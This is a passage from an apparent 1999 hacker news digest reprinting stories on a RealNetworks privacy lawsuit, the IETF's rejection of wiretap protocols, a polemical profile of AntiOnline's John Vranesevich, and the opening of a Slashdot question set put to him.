RealNetworks for invasion of privacy, trespass, and unfair competition.
The Pennsylvania plaintiffs want refunds for the software, and want
RealNetworks to provide access to the information that it collected. The
suit also asks the company to publish a remediation plan on its Web site.
The suits came following the recent discovery that as users listened to
Internet music, the RealJukebox software was transmitting detailed user
data back to the company.
South China Morning Post;
BUSINESS
RealNetworks slapped
with privacy lawsuit
NEWSBYTES
Jeffrey Wilens wants RealNetworks to face the music,
and he has gone to court in Santa Ana, California to
make them do so.
According to the class-action lawsuit filed in the Orange
County Superior Court, Wilens, an attorney who
practices consumer protection law, alleges that
RealNetworks violated California business statutes
(Business & Professions Code, 17200, et seq.) when it
failed to pay users of RealJukebox the market value of
the information it captured, or uploaded, from their
computers.
RealNetworks has previously admitted that its
RealJukebox assigned a personal ID number to users
and uploaded information about their listening habits to
its servers.
However, the company also released a patch to disable
the ID number, and said that it used the data only for
personalising the service and never sold it to third
parties.
Mr Wilens is reported in InternetNews as having
compared RealNetwork's actions in acquiring the
information as the equivalent of home burglary. The
lawsuit reportedly seeks compensatory and punitive
damages of $500 per user in the State of California.
When extrapolated out, total damages, if Mr Wilens is
successful, could reach US$500 million based on his
estimate that one million of the more than 16 million
RealJukebox users reside in California.
Jeffrey Spencer, the attorney handling Mr Wilen's' case,
said that the $550 per user figure was a "floor" figure as
to the amount of damages, and that further discovery
into RealNetworks actions could significantly raise the
amount of individual damages sought.
Punitive damages are being asked because it is alleged
that the statements RealNetworks had made to
consumers about use of their personal information were
misleading.
Mr Spenser also said that his client would not have used
RealJukebox if he had known that the Web site had the
technology of collecting an extensive amount of personal
data.
Mr Spencer said: "If they weren't using the information,
why were they collecting it?"
He indicated that he wants to find out exactly what uses
were made of the information.
Copyright (c) Post-Newsweek Business Information, Inc.
All rights reserved.
@HWA
40.0 IETF Rejects Internet Wiretapping Proposals
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by The Seventh Sign
The Internet Engineering Task Force, the ad-hoc group
that decides Internet standards, has categorically
rejected the idea of internet wiretaps. Of course
companies that make routers and other hardware are
still required to include legal wiretap capabilities into
their products.
Wired
http://www.wired.com/news/politics/0,1283,32455,00.html
PC World
http://www.pcworld.com/pcwtoday/article/0,1510,13758,00.html
Wired;
IETF Says 'No Way' to Net Taps
by Declan McCullagh
3:00 a.m. 11.Nov.1999 PST WASHINGTON -- The Internet's standards-setting
body has decisively rejected the idea of Net wiretaps.
Members attending the Internet Engineering Task Force's meeting decided
overwhelmingly on Wednesday not to provide wiretap capabilities for
governments that want to conduct surveillance online.
After a surprisingly polite debate that lasted about an hour, fewer than
25 attendees of the roughly 800-person audience voted for the proposal.
Hundreds raised their hands to object to it, while dozens abstained.
One common complaint was that inserting wiretap functionality into
standards makes them less secure, something the IETF has long opposed.
"It would be like having the Christian Coalition debating a protocol for
third-trimester abortions," said Phill Hallam-Baker, a networking security
expert.
Many governments, including the United States, require telephone companies
to configure their networks so police can easily wiretap calls. As more
phone calls flow through the Internet, the FBI has asked the IETF to
consider allowing similar lawful surveillance.
But the libertarian-leaning attendees would have none of it.
"This is not an area the IETF should be getting into," said Robert
Moskowitz, the former chairman of an IETF security working group. "This is
something that cannot be done right."
Two of the few people who spoke in favor of the concept came from Cisco, a
company that could be required to support wiretapping -- whether or not
the IETF makes the feature easy to implement.
"I'm a little concerned about [this anti-wiretap sentiment]. Clearly not
all wiretapping is illegitimate," one Cisco engineer said.
"It is legal. It is the law. Most of our customers already require it,"
said Brian Rosen of Fore Systems, which builds networking hardware.
"We're going to take a protocol that is designed here and we're going to
modify it. I assure you that a very large number of [companies] will
implement the one with the tap," he said.
The Internet Engineering Steering Group and the Internet Architecture
Board will publish a formal IETF position paper based on the rough
consensus of the audience and the views expressed during the debate.
"It is the first round in what will prove to be a very long-running debate.
It's a good starting point," said Jim Dempsey of the Center for Democracy
and Technology.
-=-
From PC World Online
Just Say No to Wiretap Protocols
Internet group IETF rejects Net-watching as "repugnant," but wiretapping
protocols already proliferate.
by Margret Johnston, IDG News Service November 12, 1999, 12:05 a.m.
PT
Should protocols be designed to help law enforcement officials wiretap the
Internet? Members of the Internet Engineering Task Force, or IETF, say no.
In an informal vote Wednesday night, the group overwhelmingly rejected
adding protocols to support such action.
The vote came as a show of hands at the end of a discussion during a
plenary meeting attended by about 2000 of the worldwide standards-setting
body who have been meeting in Washington, D.C. all week.
The major
ity opinion may be clear. But the poll resolved only the
political part of the debate, leaving the technical issues unanswered,
according to the head of the task force.
"Clearly, there was a majority who found the concept of wiretapping
repugnant," says Fred Baker, chairman of the IETF. But the IETF recognizes
that existing protocol features used commercially, such as conference call
bridges, could also be used by law enforcement for wiretapping,
Baker says.
Members present did not agree that current U.S. law requires creating a
protocol designed for wiretapping. But the FBI's interpretation is clear:
engineers designing the protocols must build in wiretapping capability,
according to Barry Smith, an agent at the FBI's Digital Telephony
and Encryption Policy unit.
One reason is the Communications Assistance for Law Enforcement Act of
1994, which requires carriers to use systems that include wiretap
capability. The act doesn't cover the Internet, but its reach is blurred
as voice telephony moves to the Internet.
Privacy Groups Lobby
Members who participated in Wednesday night's discussion also expressed a
range of opinions, often disagreeing with each other. One speaker declared
designing protocols to assist wiretapping is "beyond state of the art"
now. Another said whatever the IETF does could become irrelevant
anyway if appealed to the Federal Communications Commission.
This week, the IETF received an open letter signed by 63 privacy
advocates, computer security specialists, computer technology educators,
lawyers, and executives, urging the group not to adopt new protocols to
facilitate wiretapping. The letter says such a development will harm
security, fail to prevent crime, and would be inconsistent with previous
IETF actions.
When the vote came, only a few hands went up to the question, "Should the
IETF support protocol features whose sole use is for wiretapping?" At
least 60 percent of the members present voted no and the rest abstained.
"If there was any one consensus that came out last night, I would say it's
that the IETF in a political sense, not a technical sense, finds the idea
of invasion of privacy pretty unpalatable," Baker says. "That's not
something we would like to make easy."
But Baker acknowledges there's more to the subject. IETF will issue a
statement on the topic, probably within a future IETF communiqué on privacy,
Baker says.
@HWA
41.0 John Vranesevich, AntiOnline, Slashdot and the Synthesis
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by bronc
Sometime today Slashdot.org will be publishing an
interview with John Vranesevich of AntiOnline. The
interview will consist of questions posted by Slashdot
readers.
Slashdot.org
http://www.slashdot.org
Not sure who John Vranesevich is? Want to know what
all the hubbub is about? Check out this new article by
Bronc Buster who gives a fairly good chronological
account of the events surrounding John Vranesevich
and his site.
The Synthesis
http://www.thesynthesis.com/tech/antionline/index.html
And just in case you missed them them first time around
here is some background information for you.
Forbes - Go Ahead and Sue
http://www.forbes.com/columnists/penenberg/1999/0927.htm
CyberWire Dispatch, August 1999 - Jacking in From the "Pine-Sol" Port
http://www.hackernews.com/orig/CWD0899.html
Ottawa Citizen - Spy vs. Spy in the Hacker Underworld
http://www.attrition.org/negation/ottawa.html
Letter from Ken Williams
http://www.hackernews.com/orig/williams.html
And so that people don't think we are playing favorites
here is a
positive article.
NY Times
http://www.nytimes.com/library/tech/99/10/cyber/articles/08hackers.html
Note: Many of these articles have been printed in these pages before,
some have been reprinted here for reference purposes. - Ed
The Synthesis Article by bronc buster;
If you are familiar with the Internet I am sure you know that there are
millions of sites online covering everything from how to change a flat
tire to how to get rich quick. As you may also know, there are a ton of
nuts out there, and self-proclaimed "kings of the Internet" who are online
gods in their own minds. Well I am going to tell you a tale about John
Vranesevich, or "JP," as he likes to be called online. JP runs a site
called antionline.com, which he proclaims is a sort of headquarters for
people fighting hackers around the world. He boasts on his web site about
working closely with the U.S. Military, NASA, the Defense Information
Systems Agency and the FBI to help track, stop and catch evil, criminal
hackers. This is his mission, and he lets nothing and no one stand in his
way. In his mind, JP stands supreme with a big bank account and ample
resources to back him up.
So, tell me if this sounds familiar to you: Have you ever gone into a
"chat room" or got on IRC and witnessed a user getting mad and blubbering
that they were going to "get" someone they were mad at? They
might
say that they know how to find out where that someone lived, like they
were some sort of "Internet cop," and that they had some sort of mystical
powers to get a person in big trouble if s/he didn't immediately stop
whatever offensive actions s/he had perpetrated. If you have ever seen
anything like this happen, then this story won't be a new one, just maybe
a bit more complex and a bit more interesting.
John "JP" Vranesevich started out in Pennsylvania, in a city that he says
had very limited computer resources. He boasts that, when he was 15 years
old, he was the driving force behind getting a computer lab
upgraded
from five to 75 computers. But wait a second; a little digging will
produce three different quotes, instances in which he said three
different things (see end of story for references). First he said it was
in a public library computer lab, and that he helped it grow from five to
75 computers; in another quote he said it was his old high school's
computer lab, and it went from 50 to 600 computers.
Once JP was out of high school, he moved on to the University of
Pittsburgh, a fine institution of higher learning, enrolling in a
computer science-related major. As all Freshman are required to, he had
to live in the
dorms at PITT, which are said to be some of the
finest dorms in the country. They are wired with Ethernet connections
giving students unlimited access to the Internet, which was ideal for a
new student wanting to learn more in the field of computing sciences.
As he entered school, JP also started a small personal Web site on an
Internet account he got from a friend. Or was it an account from a local
Internet Provider that he was given in thanks for helping set up that lab
earlier? That point is also unclear; it appears he has claimed both. At
any rate, this was the beginning of AntiOnline. Soon after he moved into
the dorms and saw he had unlimited access to the Internet, he decided to
move his project site into his room and started running antionline.com
off of a small computer running Windows NT. Even though JP had signed an
agreement to obey the rules regarding use of his Internet connectionrules
which strictly forbid running any type of server like he washe pushed
ahead thinking he was protected by his right to freedom of speech. As he
became a fledging hacker wannabe in the underground community, JP started
to make friends and because his unlimited access to the 'Net was so rare
back then, he started to give out e-mail accounts, space for people to
put up Web sites, and began trading in stories of the latest hacker
exploits. I had an account on his box back then; in fact, I had several
accounts. However, in his conversations with the coordinator of
residential computer services at Pitt, Lee Bannister, JP said he never did
such things and that his server was just a personal box he experimented
with.
Needless to say, it didn't take long for the authorities at Pitt to see
what JP was doing. After he was contacted by a group in Spain about
releasing a new type of Windows attack (the infamous Win-Nuke) via
his site, his traffic went up and the authorities took notice. At first
they contacted JP and told him what he was doing was illegal and asked
him politely to stop. He simply ignored the warning. Next they
disconnected his room's Internet access and advised him to reread the
agreement he had signed. JP ignored them and just moved his box to a
friend's room, where he went back online. Then, after he was caught
several times in the school's computer labs attempting to launch Denial
of Service attacks against several Internet Service Providers across the
country, he was brought up on charges regarding his use of dorm Internet
access. JP was threatened with expulsion from Pitt.
"What!?" cried JP. "They are restricting my freedom of speech!" His
friends and hackers from across the underground community rallied to his
aidat the time, it reminded me of that really poor movie
called
Hackers, in which, at the end, hackers from around the globe unite to
stop some evil company from taking over the world, or something like
that.
JP was invited to be a guest on a weekly hacker radio show in New York
City called "Off The Hook," which is done by the fine people at 2600
Magazine. He was invited to talk about his problems at Pitt and
people responded by e-mailing, calling and writing the authorities at
Pitt who were doing this to poor JP. Soon the noise that the underground
was making started to get noticed by the mainstream media and stories
started popping up. Under the pressure of all the media attention, Pitt
agreed to back down, but only if JP agreed to obey their rules from then
on. He agreed.
Only a few weeks later, the Internet access in JP's dorm room was cut off
again, and again he started to complain about Pitt unjustly targeting
him. He said that because of the way he was treated, he decided
to
drop out of school and work on AntiOnline full time. What a bold, brave
move. After only one semester, at the tender age of 19, JP was quitting
school, not wanting to bother with learning any longer and heading out
with what he knew to take on the world.
When I contacted Pitt several months ago, Lee Bannister told me the
reason JP's Internet access was cut off was that he had again broken
their rules and put his server back up in his dorm room. Ken
Service, the spokesmen for Pitt, said in a public statement that all the
documents regarding his case were on file at Pitt, and said that the
school "had really made a genuine effort to assist him [JP] in running the
site within the policies and restrictions of the University."
JP was still riding high on his chariot of fame when some of his friends
told him about a hack they had done. He figured it would be cool to do a
little story about how elite his pals were, and put up a little story
on his site for everyone to read. After a few weeks, more people started
telling JP of their exploits and soon AntiOnline was a regular stop for
people who wanted to see the latest hack or the status of the latest
online hacker gang war. Then one day, a story popped up about how hackers
who JP knew had broken into several systems at an Indian nuclear research
center and stolen documents and e-mails regarding recent nuclear tests
conducted near the border of Pakistan. Because this was such a hot bed
issue in the news at the time, the mainstream media jumped all over it.
JP recounted in several interviews how he was in his parents' living room
fielding calls from everyone from the FBI to the Department of Defense to
various nuclear research centers across the country. The
next day JP
was on the CBS News, quoted in the New York Times, talked about on CNN
and was referred to by countless other media outlets. This was the chance
that JP had hoped and waited forfinally, big-time exposure for him and
his site. When he was later interviewed by Lewis Z. Koch, of the Cyber
Wire Dispatch, regarding the validity of these events, JP incorrectly
said that it was a research center in Israel that was hacked, and that he
hadn't really witnessed any of the hacks himself, he was just going on
the word of the 12- and 14-year-old kids who said they did it. JP never
released any of the documents he said he was given, but somehow he had
little snippets translated for him so he could post tidbits on his site.
One day early last year, JP was contacted by some people who knew little
about the fledgling Internet, and somehow decided that it would be a good
idea to invest somewhere around $250,000 in JP and
AntiOnline. Who
would do such a thing and take such a risk? To tell the truth, no one is
sure. According to an article in the New York Times, it was a large arts
and crafts company in Ohio called Darice Inc., but when contacted, the
company spokespeople said they had no idea who John Vranesevich was, and
knew nothing about any Web site called antionline.com. When I informed
Matt Richtel, the reporter who had done the New York Times story, that the
name of the company he was given for his story was bogus, he asked me to
ask JP. He wanted to knowas much as I didif and why JP had lied.
With the cash, JP got an office, set up some computers, got a high-speed
connection to the Internet and hired an old friend to help run things. From
there, he started to get sponsors, expand his empire and got
people to
write articles for him. It was an interesting time, to say the least. His
site was one of the first of its kind to get investment capital and to go
commercial, another note that the media was quick to pick up on. Once his
site was back up and all his ducks were in a row, JP went back to doing what
he did bestreporting on the things his friends did, mixing in news blurbs
from time to time.
Soon things started to change for JP and his site. After people (kids,
really) started to see that they could get some much-desired attention
(maybe their parents weren't giving them enough), they started to
manufacture hacks specifically for AntiOnline and JP. It used to be that
Web page hacks had some sort of reasoning behind them (most of the time),
but soon they started to be more and more brainless. The hacks started
being nothing more than a few cuss words and a friendly hello to JP and
AntiOnline, in hopes of bettering their chances of getting a small story
and making them famous for a few days. It was starting to become clearJP
was almost encouraging crimes so that he would have something to report
on. The more stories JP had, the more hits he could maintain. The more
hits he had, the more his sponsors would pump resources into AntiOnline.
It was simple economics, supply and demand, and JP wasn't going to
disappoint.
At the rate JP was going, it didn't take long for other people to start
to see through his façade and to see what he was really up to. It became
clear that JP had started to put a glitz on stories, and was taking
editorial liberties when reporting on them in order to sensationalize
them. JP denies ever doing any such things, of course.
A story that JP reported once comes to mind, one about a group of kids
who had broken into the Defense Information Systems Agency and stole a
"Top Secret" program that outlined networks for the military and
the
Pentagon. Reportedly, JP had gotten to see some of the information that
came with this program and he said that, via his "sources" in the
government, he was able to verify that this program was real. JP was on
CBS News a few nights later, along with one of the 14-year-old kids
(whose face was shadowed out) who said he had stolen it. It made headline
news on television, on radio talk shows and in major papers around the US.
And what a story it was. As usual, the government wouldn't comment on any
of it, so it was hard to know what was the truth and what wasn't.
After a few weeks had passed and the attention started to die down, an
e-mail popped onto a public mailing list, a list where people were
talking about JP and his site. The mail said that JP's report on the
secret
military program was a hoax. It outlined how anyone could go
to the Web site of the company that made the programs the government
used, and how anyone could download them for a free trial period. After
it was proven that what this e-mail claimed was true, a minor uproar
ensued within security and hacking circles across the Internet. People
demanded that JP correct his stories and admit that what he printed was
false. Instead, JP simply took the story out of his news archives and
never spoke on the subject again. A clean sweep under the rug.
A few months passed and the flames of the fire under JP and AntiOnline
were roaring. Everyone was up in arms over his stories and reports.
Several of his previous reports were being reviewed and some were
being proven false. People wanted to know how could he get away with such
a hoax. Some of his stories were true and others appeared to be totally
made up. As reports started to surface, and as some people started to mark
JP as a sham, he started to panic. He pulled out his trump card and
started sending letters and e-mails to people around the Internet telling
them to stop doing and saying whatever it was he didn't like, under the
threat of legal action.
People had set up parity Web sites, places like AntiOffline,
Anti-AntiOnline and the Innerpulse News Network, so he sent some of them
e-mail whining for them to stop making fun of him, or he would bring them
to
court. He even went as far as sending e-mail to a 15-year-old
high school kid who wrote and Web-posted a paper with a fictional person
in it named "PJ," because he thought it might be somehow poking fun at
him. Yes, JP told him he would seek legal actions against himor his
parents, or whomever he couldif he didn't take down his story. He sent
e-mails to people running sites like Attrition, to their Internet
provider, and to their Internet provider's provider, complaining about how
attrition.org kept an archive of all the errors he had made, and how they
were pointing them out to people whenever they were asked to. As a matter
of fact, he even sent me e-mail telling me he would take legal actions
against me if I didn't leave him alone. Hell, I bet The Synthesis gets a
threatening e-mail after this story runs.
Adam Penenberg, a columnist and the senior editor at forbes.com, the
Forbes Magazine online site, said in a recent article, "Of course, JP has
nothing against good press. It's the bad press that lets him
unsheathe his sharpest weapon. No, not the facts; those would only get in
the way. We're talking about the threat of a lawsuit." The list of people
he has threatened to sue is longer than Santa Claus' Christmas list. Only
one minor detail JP seemed to forgetwe, his detractors, are also
protected by the First Amendment, entitled to our opinions. If he doesn't
like them, he doesn't have to listen.
After JP's suing spree ended, he turned himself into the laughing-stock
of Internet security and hacking circles by changing his mission
statement. He went from being a reporter and a self-proclaimed security
expert to being a simple "security enthusiast" and the Net's "number one
hacker-catcher." He had, in effect, declared war on the underground
because it hadn't accepted him as one of its own.
"I have yet to see anything useful come out of AntiOnline or John
Vranesevich; he has not contributed anything to the online community. Not
one line of code, not one exploit, not one advisory has he issued. Most
of
the content on his Web site has been taken from elsewhere. He has
done absolutely nothing, yet somehow maintains his status as some sort of
information security God," says Space Rogue, who works with L0pht Heavy
Industries (hacker collective on the forefront of the movement) and is
the editor of the Hacker News Network.
Mainstream media outlets stopped quoting JP, his sponsors started to
withdraw their support, his hits were starting to drop, and according to
one of his writers, he was finally operating in the red.
"With his change in editorial viewpoint, however, along with his waning
credibility among hackers, JP and AntiOnline became simply less useful to
me as a source of knowledge or expertise. There are better
sources
for me to use to gain access to the hacking community, and there are
better sources among the anti-hacker security community as well," says
Michael Martinez, an Associate Producer at ABCnews.com, regarding JP's
current stance on hacking. "This isn't a slam against JP or his site,
because he's free to take his publication in any direction he likes and I
wish him well. But for my purposes, the thing that made his site
specialthat bridge between hackers and security expertsis no longer
there."
Other long-standing security sites were starting to gain his traffic, and
JP knew it. Packet Storm Security, one of the largest archives of free
security tools and security-related topics on the Web, was becoming the
main site on the 'Net for people interested in security. It had gigs and
gigs of files and was updated every day, not to mention it was very
anti-JP. Packet Storm had become so popular that its owner, Ken Williams,
a graduate student at the University of North Carolina, couldn't afford
to continue to operate it paying all the expenses out of his own pocket,
so he asked for help. With the popularity of his site and how helpful he
was to the Web community, an army lined up to offer him assistancea line
that included Harvard University, who offered to host his site on their
systems for free. Ken jumped at the idea and spent the next month moving
his site over, getting the system ready and putting in countless hours of
upgrades for the grand re-opening. When it reopened, Packet Storm was
getting hundreds of thousands of hits every day and was by far the
biggest, most popular and most supported freeware security site on the
Internet at that time, or for that matter, ever.
What did JP do? In typical fashion, he bought a special computer program,
or "bot" as they are called, which, when let loose on a Web site,
basically rips off the entire site. He downloaded the Packet Storm info
to
AntiOnline for examination, and JP took what he wanted from it.
During this raping of the Packet Storm site, the bot came across a
private directory (not a publicly-visible directory). It had a picture of
JP and his sister from their high school's online year book, as well as a
collection of a few e-mails and Web sites Ken had been sent regarding JP
(none of which were very favorable towards JP, but none of which I saw
advocated violence or contained pornography).
JP saw an opportunity and he ran with it. The next day, he contacted
Harvard and told them Ken had a directory on his site containing
"pornographic material," "degrading pictures" of him and his family, and
contained "death threats" against the Vranesevich clan. He even went as
far as to say he had hired a full-time security guard for his offices
because he feared for his life, and that Harvard was going to have to pay
the price if they didn't remove the site ASAP. Again in typical fashion,
JP implied he was going to take legal actions against them. Harvard's
reaction was knee-jerk: It had never been in a situation like this
before, so the school sent someone to pull the plug on Packet Storm and
dismantle the box. It was done so fast they didn't even talk to the
administrators at Harvard who had direct control over the box, and didn't
even notify Ken as to what was going on.
Again, an online riot ensued. Wired and Zdnet ran stories on what had
happened, and security circles and hackers alike were in an uproar,
wanting JP's proverbial head on a digital platter. Because the site was
part of Ken's Master's degree project and his access to it was totally
cut off for weeks, he had to drop out of school or risk taking failing
marks. There were rumors that Harvard might try to sue him, and JP as
well. Soon the tide started to turn, the truth came out and JP found
himself taking the brunt of the 'Net community's wrath. Ken was a popular
person and his site was totally free, while JP was despised by many and
his site was commercial.
At DefCon '99 (DefCon is an annual hacker convention held in Las Vegas),
there were "Wanted" posters all over the hotel. They featured a picture
of JP, called him a narc and gave information about some of the
stuff he is alleged to have done. There were so many sites on the 'Net
going after JP, it was difficult to keep track of them all, and the
number of attacks against AntiOnline soared so high that the site's
Internet Provider, StarGate.net, had to pull the plug on his site several
times to avoid crashing their entire network.
All this wasn't totally bad, though. Ken Williams was eventually offered
a high-paying security job and his site was bought for a reported (not
confirmed) $125,000 by the security firm Kroll-O'Gara, and put back
online a month later.
According to Carolyn Meinel, a staunch JP supporter, writer, consultant
and far from a favorite in hacker circles herself, "John Vranesevich
showed courage and compassion for his kid sister when he complained
to Harvard that Ken Williams' Packet Storm Web site carried her photo,
home address and incitements to harm her. Vranesevich could have just sat
on his rear end and waited for the police to go after Ken. Instead, he got
the threatening material removed forever from the Web, Williams got paid
a ton of money for the technical portion of Packet Storm, and now the
loud mouths of the computer security industry say Vranesevich was the bad
guy."
Despite these kind words from his friend, JP is still on the outs with
most of the security world and hackers alike. As of this day, if you were
to visit AntiOnline, it would almost read like you were on the Web site
of
an extremist group. JP comes across like he is against anything
and everyone whose views do not match his, and he is apparently very
bitter because of the nonstop attacks against him. In a recent story
posted on his site,
(http://www.antionline.com/cgi-bin/features/News_Spoof?date=10-06-1999)
he joked about how some of his critics at Attrition had joined forces
with pedophiles. After being accused of this, Brian Martin, the founder of
Attrition and a security professional said, "It is truly unfortunate that
a single person is duped by Vranesevich and AntiOnline. Their history of
libel and slander, inaccurate and biased 'journalism,' sparse news updates
and other unprofessional behavior represents the baseline of negativity
and unethical actions."
How low can someone go when they say their critics rape children? Why
does he do it? It's simplehe wants the attention. There is an old
saying, "bad press is still press," and at this point, JP is itching for
any
press he can get to drive up his hits, even if it means pissing
off everyone on the Internet in the process.
"I am constantly amazed at how John Vranesevich pisses off large numbers
of people seemingly on purpose. From my point of view, it seems as though
he purposely stirs up controversy to draw attention to his
site and
himself," says L0pht Heavy Industries' Space Rogue.
"We're thinking about making JP honorary director in charge of global
marketing [for Packet Storm Security]," says Matt Barrie, the current
director of Packet Storm Security for Kroll-O'Gara, in a blatantly
sarcastic, humorous tone. "He created the opportunity for us to obtain
it, creating so much hype in the process that we now get more hits to the
site than Ken ever did, plus he links to us from AntiOnline. We love the
guy! The more he says, the more we benefit! Keep up the good work!"
At this point, JP will probably be glad this article came out just
because it's more time his name will spend in the print.
The JP story continues on to this day. People are still criticizing him,
attempting to prove him as a fake, while he still goes on writing stories
and continuing to "work with the FBI catching evil hackers across the
country," as he boasts. Well, that last part is still a matter of debate.
When I contacted the FBI's public relations department and submitted my
questions regarding JP and AntiOnline, they said they do not comment on
any ongoing case, anyone they might have under investigation, or anyone
who might be working with them anonymously supplying tips. They did note,
however, that they had no records of any contract with anyone named John
Vranesevich or a company called AntiOnline. I guess this means he could
be supplying tips to the FBI, anonymously or otherwise, but anyone can do
that via a 1-800 number. Besides, does that constitute a working
relationship with the FBI? I think Ken Williams, founder of Packet Storm
Security who now works professionally in the security world, put it best:
"The fact that the FBI 'consults' with JP does not in any way validate
the work of a technologically-inept jackass who thrives on intimidation.
It does, nevertheless, illustrate why the FBI should now give Special
Agent badges to JP, Elvis and maybe even the Easter Bunny."
Bronc Buster is an established California-based hacker who was featured
in SPIN Magazine's November, 1999 issue. He can be reached via e-mail at
bronc@2600.com.
Web sites and articles mentioned in this story, as well as places to find
out more information about this subject:
Was it a library or a high school JP set the lab up in? Who did what at
Pitt? How did JP first get his site up? What did he tell the NY Times?
See for yourself through the links below:
http://www.wired.com/news/news/culture/story/8685.html
http://www.wired.com/news/news/culture/story/9116.html
http://www.nytimes.com/library/tech/99/10/cyber/articles/08hackers.html
Attrition joins forces with Pedophiles?
http://www.antionline.com/cgi-bin/features/News_Spoof?date=10-06-1999
Forbes Story on JP:
http://www.forbes.com/columnists/penenberg/1999/0927.htm
Cyber Wire Dispatch Story (mirror thanks to HNN):
http://www.hackernews.com/orig/CWD0899.html
Attrition archives of JPs errors:
http://www.Attrition.Org/negation
Other sites of interest in regards to this article:
http://www.antionline.com AntiOnline
http://www.attrition.org Attrition web site
http://packetstorm.securify.com Packet Storm Security
http://www.slashdot.org Slash Dot News
http://www.hackernews.com Hacker News Network
http://www.happyhacker.org Carolyn Meinels Happy Hacker web site
http://www.2600.com 2600 Magazine
http://www.innerpulse.com Inner Pulse News
http://www.defcon.org DefCon Convention Web Site
http://www.l0pht.com L0pht Heavy Industries
Bronc Buster is an established California-based hacker who was featured
in SPIN Magazines November, 1999 issue. He can be reached via e-mail at
bronc@2600.com.
The non-interview;
Posted by Roblimo on Friday November 12, @11:22AM from the
bobbing-and-weaving-and-ducking dept. Monday, when we asked you to Grill
John Vranesevich, we got mostly flames (as expected), but somehow we
managed to extract 12 hard-nosed questions from the ashes. Sadly, Mr.
Vranesevich chose not to respond to them directly, but sent an
argumentative screed instead. Below you'll find the questions we sent,
followed by Mr. Vranesevich's essay in its entirety (including his
original HTML formatting), along with a link to a Forbes story that is,
um, not exactly complimentary to him.
Question #1 by manitee
Having read many accounts of your interactions with the staff of
attrition.org, it seems to me that your claims against them are generally
unproven and rash. Their rebuttals are always filled with detailed fact
and systematic, step by step analysis of the topic at hand. Please clarify
why you feel that attrition.org is such a dangerous force, yet you have
never been able to present HARD EVIDENCE to that point.
Question #2 by davidu
Many of us in the hacker community (not cracker) used the Packet Storm
security site for information and research. You had it shut down for some
alleged things in the /jp directory. Explain to us why you called
[Harvard] to shut it down rather than dealing with the maintainer. What
did you accomplish by threatening to sue other than futher harm your image
and remove any creditbilily you had?
Question #3 by Kintanon
What is the basis for your attacks on security Experts such as
Attrition.org?
To Clarify the question: Why do you proclaim them to be 'dangerous
hackers' while they do essentially the same thing you claim to do, except
that they do so better, faster, and more professionally?
Question #4 by mattc
Why did you deliberately block links from Slashdot, HNN, and any other
site who criticized you during the closure of Packetstorm?
#5 by WH How do you respond to allegations that the FBI is investigating
your knowledge of attacks before they happened and the accusations by some
hackers who performed said attacks that you paid them or otherwise coerced
them to do it in order to have coverage for your website?
#6 also by WH
Why do you feel that sites containing satirical humor based [on]
antionline are not protected by law and therefore open to your threats of
legal action?
#7 by Hard_Code
Are the rumors that you will be spinning off a sister site called
Anti-Anti-Anti-Online to dispell the malicious accusations and
deprecations of your obviously magnanimous professionalism and intellect
and to further bolster the image of Anti-Online and your integrity as a
computer- security- expert- guru- enthusiast, true?
#8 - #11 by Jeff - (Heavily edited - RM)
I have several questions which I will ask within the narrative below. The
narrative is important to understand the context of the questions, and to
support my arguments.
Several months ago I was raided by FBI for supposed involvement with the
"hacker" group gh. The extent of my involvement was participating, as a
caller only, in illegally funded phone conferences. JP, who also
participated in this conferences, labeled me as a hacker, and a member of
gh on his "news" site. Neither of these accusations are true. He has many
more ties to this and other hacker groups than I have ever had....
#8 - How can you pretend to be taking a stand against "hackers" while you
are involved in the same activities?
#9 - My third question is in regards to your coverage of the situation.
You posted unconfirmed information from an unreliable source in regards to
the status of my employment at a prominent software development company.
As a result of this I was contact by several news agencies, and
immediately stereotyped as a hacker even though I have never illegally
penetrated any computer system, nor had I been charged with, or accused of
any crimes by the FBI. In response to this I granted one news agency an
interview, which I thought went well, but also backfired. As a result of
the negative press my former employer could not even consider allowing me
to stay. My question being, Do you expect people to consider you as a
reliable news source even though you report data which you receive through
unreliable channels?
#10 - Did you ever stop to think what the impact of your coverage might
be? It seems to me that in your rush for the big story you have failed to
check for the correctness in your articles, and as a result of this you
are hurting innocent people, such as myself. I'm sure this has gone on in
other cases, but mine is the only one I have enough knowledge to comment
on. I don't attribute these unfortunate events to you, but you certainly
did not follow good news practices in reporting them. You have only served
to injure my credibility and your own.
11 - Lastly, have you ever considered what legal action may be taken
against you for your involvement with these criminals? Do you even
recognize the hypocrisy of your stance on hackers being one yourself by
your own definition?
Question #12 by sonoffreak
Why did you decide to let Slashdot interview you? How did the response you
got compare to what you expected?
John Vranesevich's Response:
Greetings All
Well, I've seen many people say that I can't take criticism. Believe me,
if that were true, I surely never would have opened myself up to a
SlashDot inquisition. I knew before I even agreed to the interview, that
things would be ugly. Needless to say, I was right on the money. However,
I will say this. I was very disappointed in the downright lack of maturity
that many of the posts showed. I like to believe that most people who
frequent this type of forum are of an intellectual nature. I found it very
disheartening to hear nearly every rumor ever voiced about myself or my
company being regurgitated as if they were all fact. An educated bunch of
people should understand that not everything that they hear is true at
all, and that almost nothing that they hear is totally accurate. But, some
of that could be my fault. Many posts pointed out the fact that I have
never "given explanations of" or provided "blow-by-blow responses" to any
of the things that have been written about me. This is true. If I spent my
life defending myself from every individual who had a nasty thing to say
about me, my life would end up pretty meaningless in the end. I think
that's true for most people. I decided a long time ago that I wouldn't
allow myself or my website to become dedicated to those who would seek to
bring me down. I have a lot of goals in my life, and I'm not about to let
nonsense get in their way. But, never the less, I saw this SlashDot
invitation as the perfect opportunity to talk about some of those very
issues. It's not that I feel that people who posted negative comments will
read what I have to say, and then decide that they were totally wrong
about me. Those who despise me for whatever reason will continue to do so
no matter what I ever say or do. Even SlashDot faced the wrath of dozens
of people who are "no longer going to visit this site" for one reason or
another after reading the interview bio on Monday. So much for loyalty in
this day and age I suppose.
Yours In CyberSpace, John Vranesevich Founder, AntiOnline
Now, On To The Questions
I received a list of "questions" from Robin earlier this week, and to put
it bluntly, they were just stupid. I'm not going to waste my time writing
up ridiculous answers to ridiculous questions that no one really cares
about. For example, here is one of the questions posed to me
"Are the rumors that you will be spinning off a sister site called
Anti-Anti-Anti-Online to dispel the malicious accusations and deprecations
of your obviously magnanimous professionalism and intellect and to further
bolster the image of Anti-Online and your integrity as a
computer-security-expect-guru-enthusiast, true?"
